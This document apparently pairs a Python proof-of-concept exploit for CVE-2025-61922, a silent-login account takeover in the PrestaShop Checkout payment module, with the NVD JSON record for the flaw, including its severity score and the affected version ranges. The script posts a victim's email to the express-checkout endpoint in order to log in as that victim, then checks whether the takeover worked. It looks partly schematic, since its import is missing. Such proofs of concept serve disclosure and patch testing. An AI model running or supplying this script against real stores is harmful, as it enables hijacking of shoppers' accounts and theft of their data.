CVE-2025-61922

# CVE-2025-61922 PoC - PrestaShop Checkout Silent Login / Account Takeover # Vulnerability: Missing validation on Express Checkout feature allows silent login import requests TARGET_URL = "https://target-prestashop-site.com" VICTIM_EMAIL = "[email protected]" # Step 1: Initiate Express Checkout session session = requests.Session() # Step 2: Access the checkout page to obtain necessary tokens express_checkout_url = f"{TARGET_URL}/module/ps_checkout/expressCheckout" response = session.get(express_checkout_url) # Step 3: Trigger Express Checkout with victim's email address # The missing validation allows the attacker to impersonate the victim payload = { "email": VICTIM_EMAIL, "action": "expressCheckout", "checkoutType": "EXPRESS" } # Step 4: Submit the request to silently log in as the victim response = session.post( f"{TARGET_URL}/module/ps_checkout/expressCheckout", data=payload ) # Step 5: Verify account takeover by accessing account page account_response = session.get(f"{TARGET_URL}/my-account") if "My Account" in account_response.text and VICTIM_EMAIL in account_response.text: print(f"[+] Successfully took over account: {VICTIM_EMAIL}") else: print("[-] Exploit failed")

{"cve": {"id": "CVE-2025-61922", "sourceIdentifier": "[email protected]", "published": "2025-10-16T18:15:38.597", "lastModified": "2025-12-29T20:06:13.033", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "PrestaShop Checkout is the PrestaShop official payment module in partnership with PayPal. Starting in version 1.3.0 and prior to versions 4.4.1 and 5.0.5, missing validation on the Express Checkout feature allows silent login, enabling account takeover via email. The vulnerability is fixed in versions 4.4.1 and 5.0.5. No known workarounds exist."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-287"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "1.3.0", "versionEndExcluding": "7.4.4.1", "matchCriteriaId": "78BDECB6-6142-47A0-89D1-C96DE8B052EB"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "7.5.0.1", "versionEndExcluding": "7.5.0.5", "matchCriteriaId": "36D48F64-2C0D-4DF7-9FBB-26FF21B9C71B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.3.1.0", "versionEndExcluding": "8.4.4.1", "matchCriteriaId": "78BB8AD6-68E4-426F-B9D9-1810D37193D4"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "8.5.0.0", "versionEndExcluding": "8.5.0.5", "matchCriteriaId": "CF84DA7C-A801-4366-8463-F6FD21A69263"}, {"vulnerable": true, "criteria": "cpe:2.3:a:prestashop:prestashop_checkout:*:*:*:*:*:prestashop:*:*", "versionStartIncluding": "9.4.3.1", "versionEndExcluding": "9.5.0.5", "matchCriteriaId": "FBB531A1-D85B-4987-89FB-EC28C974301F"}]}]}], "references": [{"url": "https://github.com/PrestaShopCorp/ps_checkout/security/advisories/GHSA-54hq-mf6h-48xh", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}